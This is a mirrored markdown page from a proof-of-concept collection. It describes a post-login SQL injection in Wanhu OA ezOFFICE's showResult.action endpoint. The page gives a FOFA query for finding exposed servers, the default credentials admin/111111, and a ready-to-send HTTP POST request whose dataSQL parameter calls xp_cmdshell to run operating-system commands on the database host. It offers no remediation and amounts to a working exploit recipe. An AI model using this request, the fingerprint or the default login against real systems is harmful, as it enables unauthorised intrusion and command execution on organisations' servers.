admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/万户OA showResult.action 后台SQL注入漏洞.md
Threekiii b7e3b03ac7 更新漏洞库:OA产品漏洞/
2022-05-20 15:57:09 +08:00

45 lines
1.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 万户OA showResult.action 后台SQL注入漏洞
## 漏洞描述
万户OA showResult.action 存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
万户OA
```
## FOFA
```
app="万户网络-ezOFFICE"
```
## 漏洞复现
产品页面
![image-20220520132902980](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201329080.png)
默认账号密码admin/111111
发送请求包:
```
POST /defaultroot/Graph!showResult.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Cookie: OASESSIONID=5AC1D44965A277C90D94B57DEDA82992; LocLan=zh_CN; JSESSIONID=5AC1D44965A277C90D94B57DEDA82992; OASESSIONID=5AC1D44965A277C90D94B57DEDA82992; ezofficeDomainAccount=whir; empLivingPhoto=; ezofficeUserName=dsfssaq; ezofficeUserPortal=; ezofficePortal135=1
Upgrade-Insecure-Requests: 1
database=localDataSource&dataSQL=exec+master..xp_cmdshell+"ipconfig";
```
![image-20220520132915993](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201329050.png)
Reference in New Issue View Git Blame Copy Permalink